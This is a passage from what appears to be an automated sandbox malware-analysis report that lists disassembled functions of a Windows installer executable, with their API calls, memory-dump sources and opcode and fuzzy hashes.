                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                                                                                                                  • API String ID: 190572456-3990135632
                                                                                                                                                                                                                                  • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                                                                                                                  • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041C148 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041C168
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 0041C174
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                                                                                                                                                  • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3303097818-0
                                                                                                                                                                                                                                  • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                                                                                                                  • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00418C54 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                                                                                                                                                  • 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                                                                                                                                                    • Part of subcall function 004107F8: 6F54C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                                                                                                                                                  • 6F5BCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                                                                                                                                                  • 6F5BC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                                                                                                                                                  • 6F5BCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                                                                                                                                                  • 6F550860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$C400C740F550860F552980
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1828538299-0
                                                                                                                                                                                                                                  • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                                                                                                                  • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00483C6C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                                                                                                                  • API String ID: 47109696-2530820420
                                                                                                                                                                                                                                  • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                                                                                                                  • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B462 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1458357782-0
                                                                                                                                                                                                                                  • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                                                                                                                                  • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00495508 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00495519
                                                                                                                                                                                                                                    • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                                                                                                                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                  • API String ID: 2948443157-222967699
                                                                                                                                                                                                                                  • Opcode ID: a4d12ece59ca6c64cb8c4defcdc73c5f067a9176de86fed221050984d74d5100
                                                                                                                                                                                                                                  • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4d12ece59ca6c64cb8c4defcdc73c5f067a9176de86fed221050984d74d5100
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423394 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 004233AF
                                                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00423413
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1770779139-0
                                                                                                                                                                                                                                  • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                                                                                                                  • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0049532C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                                                                                                  • API String ID: 667068680-2254406584
                                                                                                                                                                                                                                  • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                                                                                                                                  • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D688 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                                                                                                  • API String ID: 190572456-212574377
                                                                                                                                                                                                                                  • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                                                                                                                                  • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042EA1C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                                                                                                                                                                    • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                                                                                                                                    • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                                                                                                                                    • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                                                                                                                                  • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                                                                                                                  • API String ID: 142928637-2676053874
                                                                                                                                                                                                                                  • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                                                                                                                                  • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044C7DC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
